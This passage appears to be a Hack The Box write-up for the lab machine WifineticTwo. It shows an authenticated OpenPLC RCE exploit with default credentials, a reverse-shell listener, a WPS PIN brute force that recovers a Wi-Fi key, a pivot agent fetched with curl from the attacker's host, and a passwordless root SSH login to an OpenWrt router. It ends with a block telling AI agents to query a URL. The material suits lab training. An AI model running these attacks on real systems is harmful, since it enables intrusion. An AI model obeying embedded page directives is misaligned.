# HTB - WifineticTwo
## Machine Info
WifineticTwo is a medium-difficulty Linux machine that features OpenPLC running on port 8080, vulnerable to Remote Code Execution through the manual exploitation of `[CVE-2021-31630]`. After obtaining an initial foothold on the machine, a WPS attack is performed to acquire the Wi-Fi password for an Access Point (AP). This access allows the attacker to target the router running `OpenWRT` and gain a root shell via its web interface.
## Enumeration
***
**Scope**
> IP Address: 10.10.11.7
**Nmap Scan**
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
8080/tcp open http-proxy syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
8080/tcp open http-proxy Werkzeug/1.0.1 Python/2.7.18
|_http-server-header: Werkzeug/1.0.1 Python/2.7.18
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was http://10.10.11.7:8080/login
```
```
* Open ports: 22 - 8080
* Services: SSH - HTTP
* Important notes: openPLC
```
```bash
┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo/CVE-2021-31630-HTB]
└─$ sudo sh -c "echo '$ip wifinetictwo.htb' >> /etc/hosts"
┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo/CVE-2021-31630-HTB]
└─$ tail -n1 /etc/hosts
10.10.11.7 wifinetictwo.htb
```
`http://10.10.11.7:8080/login`
A quick search about `OpenPLC` CVEs
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/WifineticTwo]
└─$ searchsploit OpenPLC
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenPLC 3 - Remote Code Execution (Authenticated) | python/webapps/49803.py
OpenPLC WebServer 3 - Denial of Service | multiple/dos/51746.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
```
## Initial Access
I don't have credential yet, So I tried default one: `openplc:openplc` and It worked
`http://10.10.11.7:8080/dashboard`
The exploit we have need credential, now I can run it.
{% embed url="" %}
```bash
┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo]
└─$ git clone https://github.com/thewhiteh4t/cve-2021-31630.git
┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo/cve-2021-31630]
└─$ python3 cve_2021_31630.py -u openplc -p openplc -lh 10.10.16.7 -lp 443 http://10.10.11.7:8080
------------------------------------------------
--- CVE-2021-31630 -----------------------------
--- OpenPLC WebServer v3 - Authenticated RCE ---
------------------------------------------------
[>] Found By : Fellipe Oliveira
[>] PoC By : thewhiteh4t [ https://twitter.com/thewhiteh4t ]
[>] Target : http://10.10.11.7:8080
[>] Username : openplc
[>] Password : openplc
[>] Timeout : 200 secs
[>] LHOST : 10.10.16.7
[>] LPORT : 443
[!] Checking status...
[+] Service is Online!
[!] Logging in...
[+] Logged in!
[!] Restoring default program...
[+] PLC Stopped!
[+] Cleanup successful!
[!] Uploading payload...
[+] Payload uploaded!
[+] Waiting for 5 seconds...
[+] Compilation successful!
[!] Starting PLC...
[+] PLC Started! Check listener...
[!] Cleaning up...
[+] PLC Stopped!
[+] Cleanup successful!
```
Receive Connection
```bash
┌──(kali㉿kali)-[~/study/Courses/HackThebox/HTB/machines/WifineticTwo]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.7] 47504
id
uid=0(root) gid=0(root) groups=0(root)
```
Upgrade the shell
```bash
script /dev/null -c bash
Ctrl+z
stty -echo raw; fg
reset
Terminal type? screen
stty rows 37 columns 189
export TERM=xterm-256color
```
I found my myself running command as `root`, maybe I'm in docker container or kind of virtualization.
The user flag is in `/root` directory
```bash
root@attica01:/# ls /root
user.txt
root@attica01:~# cat user.txt
850e68329cf676exxxxxxxxxxxxxxxx
```
> User Flag: 850e68329cf676exxxxxxxxxxxxxxxx
***
## Privilege Escalation
The IP Address of the machine is not here, that makes me sure I'm not on the actual host. There is `wlan0` interface also.
```bash
root@attica01:/# ifconfig
eth0: flags=4163 mtu 1500
inet 10.0.3.2 netmask 255.255.255.0 broadcast 10.0.3.255
inet6 fe80::216:3eff:fefc:910c prefixlen 64 scopeid 0x20
ether 00:16:3e:fc:91:0c txqueuelen 1000 (Ethernet)
RX packets 5716 bytes 529625 (529.6 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4286 bytes 1207374 (1.2 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73 mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
loop txqueuelen 1000 (Local Loopback)
RX packets 715 bytes 39478 (39.4 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 715 bytes 39478 (39.4 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4099 mtu 1500
ether 02:00:00:00:02:00 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
```
I uploaded `linpeas.sh` to the hox to enumerate and collect useful info from the host but didn't find anything interesting
`linpeas.sh` tells me that it's a virtual machine `(lxc)`
```bash
═╣ Is this a virtual machine? ..... Yes (lxc)
```
Enumerating installed program shows that there are `wireless` tools here
```bash
root@attica01:~$ apt list --installed | cut -d"/" -f1,3
whiptail
wireless-regdb
wireless-tools
wpasupplicant
```
Following up this post, I was able to deal with wireless technology in that host:
{% embed url="" %}
```bash
root@attica01:~$ iw wlan0 scan
BSS 02:00:00:00:01:00(on wlan0)
last seen: 4928.704s [boottime]
TSF: 1721706237223201 usec (19927d, 03:43:57)
freq: 2412
beacon interval: 100 TUs
capability: ESS Privacy ShortSlotTime (0x0411)
signal: -30.00 dBm
last seen: 0 ms ago
Information elements from Probe Response frame:
SSID: plcrouter
Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
DS Parameter set: channel 1
ERP: Barker_Preamble_Mode
Extended supported rates: 24.0 36.0 48.0 54.0
RSN: * Version: 1
* Group cipher: CCMP
* Pairwise ciphers: CCMP
* Authentication suites: PSK
* Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
Supported operating classes:
* current operating class: 81
Extended capabilities:
* Extended Channel Switching
* SSID List
* Operating Mode Notification
WPS: * Version: 1.0
* Wi-Fi Protected Setup State: 2 (Configured)
* Response Type: 3 (AP)
* UUID: 572cf82f-c957-5653-9b16-b5cfb298abf1
* Manufacturer:
* Model:
* Model Number:
* Serial Number:
* Primary Device Type: 0-00000000-0
* Device name:
* Config methods: Label, Display, Keypad
* Version2: 2.0
```
I got a hint from community about `oneshot` tool that attacks `wireless` by brute force attack.
```bash
root@attica01:~$ python3 oneshot.py -i wlan0
[*] Running wpa_supplicant…
[*] BSSID not specified (--bssid) — scanning for available networks
Networks list:
# BSSID ESSID Sec. PWR WSC device name WSC model
1) 02:00:00:00:01:00 plcrouter WPA2 -30
Select target (press Enter to refresh): 1
[*] Running wpa_supplicant…
[*] Trying PIN '12345670'…
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 02:00:00:00:01:00 (ESSID: plcrouter)
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[*] Sending WPS Message M2…
[*] Received WPS Message M3
[*] Sending WPS Message M4…
[*] Received WPS Message M5
[+] The first half of the PIN is valid
[*] Sending WPS Message M6…
[*] Received WPS Message M7
[+] WPS PIN: '12345670'
[+] WPA PSK: 'NoWWEDoKnowWhaxxxxxxxxxxx'
[+] AP SSID: 'plcrouter'
```
Connect to `plcrouter` network
```bash
root@attica01:~$ wpa_passphrase plcrouter >> /etc/wpa_supplicant/wpa_supplicant.conf
# reading passphrase from stdin
NoWWEDoKnowWhaxxxxxxxxxxx
root@attica01:~$ wpa_supplicant -B -D wext -i wlan0 -c /etc/wpa_supplicant/wpa_supplicant.conf
Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control device
ioctl[SIOCSIWENCODEEXT]: Invalid argument
ioctl[SIOCSIWENCODEEXT]: Invalid argument
```
Verify successful connection
```bash
root@attica01:~# iw wlan0 link
Connected to 02:00:00:00:01:00 (on wlan0)
SSID: plcrouter
freq: 2412
RX: 16029 bytes (229 packets)
TX: 1116 bytes (11 packets)
signal: -30 dBm
rx bitrate: 1.0 MBit/s
tx bitrate: 12.0 MBit/s
bss flags: short-slot-time
dtim period: 2
beacon int: 100
```
But I didn't get an IP Address
```bash
root@attica01:~# ip addr show wlan0
5: wlan0: mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 02:00:00:00:02:00 brd ff:ff:ff:ff:ff:ff
inet6 fe80::ff:fe00:200/64 scope link
valid_lft forever preferred_lft forever
```
Adding one.
> I wasn't sure which CIDR IP to assign to the interface, so I decided to give it a try.
```bash
root@attica01:~$ ifconfig wlan0 192.168.1.5 netmask 255.255.255.0
root@attica01:~$ ifconfig wlan0
wlan0: flags=4163 mtu 1500
inet 192.168.1.5 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::ff:fe00:200 prefixlen 64 scopeid 0x20
ether 02:00:00:00:02:00 txqueuelen 1000 (Ethernet)
```
I set up a tunnel to enumerate the new network from my kali machine.
```bash
┌──(kali㉿kali)-[~/…/Tools/Pivot/ligolo-ng]
└─$ ./proxy-server -selfcert
WARN[0000] Using automatically generated self-signed certificates (Not recommended)
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/
Made in France ♥ by @Nicocha30!
ligolo-ng »
```
```bash
root@attica01:~$ curl 10.10.16.7/agent.sh -o agent.sh
root@attica01:~$ chmod +x agent.sh
root@attica01:~$ ./agent.sh -connect 10.10.16.7:11601 -ignore-cert
```
```bash
ligolo-ng » session
1
ligolo-ng » start
```
Add the network route to ligolo interface and Ping sweep the network with fping
```bash
┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo]
└─$ sudo ip route add 192.168.1.0/24 dev ligolo
┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo]
└─$ fping -asgq 192.168.1.0/24
192.168.1.1
192.168.1.5
```
192.168.1.5 is the IP I assigned to wlan0 interface, So I will attack 192.168.1.1
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/WifineticTwo]
└─$ nmap 192.168.1.1 -F -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 00:19 EDT
Nmap scan report for 192.168.1.1
Host is up (0.10s latency).
Not shown: 92 closed tcp ports (conn-refused)
PORT STATE SERVICE
7/tcp filtered echo
22/tcp open ssh
53/tcp open domain
80/tcp open http
443/tcp open https
514/tcp filtered shell
2001/tcp filtered dc
49154/tcp filtered unknown
```
I found ssh is there, so I tried to connect to it as root
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/WifineticTwo]
└─$ ssh root@192.168.1.1
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
ED25519 key fingerprint is SHA256:ZcoOrJ2dytSfHYNwN2vcg6OsZjATPopYMLPVYhczadM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.1' (ED25519) to the list of known hosts.
BusyBox v1.36.1 (2023-11-14 13:38:11 UTC) built-in shell (ash)
_______ ________ __
| |.-----.-----.-----.| | | |.----.| |_
| - || _ | -__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____|
|__| W I R E L E S S F R E E D O M
-----------------------------------------------------
OpenWrt 23.05.2, r23630-842932a63d
-----------------------------------------------------
=== WARNING! =====================================
There is no root password defined on this device!
Use the "passwd" command to set up a new password
in order to prevent unauthorized SSH logins.
--------------------------------------------------
root@ap:~#
```
```bash
root@ap:~$ cat root.txt
bd361577bf4d8653xxxxxxxxxxxxxxxx
```
> Root Flag: bd361577bf4d8653xxxxxxxxxxxxxxxx
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://blind0bandit.gitbook.io/blog/linux-machines/medium/htb-wifinetictwo.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.